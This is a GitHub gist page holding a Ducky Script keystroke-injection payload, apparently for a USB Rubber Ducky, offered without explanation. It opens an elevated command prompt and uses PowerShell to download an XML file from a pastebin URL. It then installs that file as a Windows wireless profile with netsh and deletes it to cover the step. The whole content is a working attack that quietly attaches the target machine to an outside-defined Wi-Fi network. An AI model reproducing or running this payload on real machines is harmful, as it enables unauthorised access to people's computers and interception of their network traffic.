Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save JonnyBanana/cf32d3262053f04cb4d939d6b92d42e2 to your computer and use it in GitHub Desktop.
Save JonnyBanana/cf32d3262053f04cb4d939d6b92d42e2 to your computer and use it in GitHub Desktop.
DEFAULT_DELAY 200
DELAY 3000
GUI r
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
STRING cd %TEMP%
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml')
ENTER
DELAY 1000
ENTER
STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection"
ENTER
STRING del a.xml
ENTER
STRING exit
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment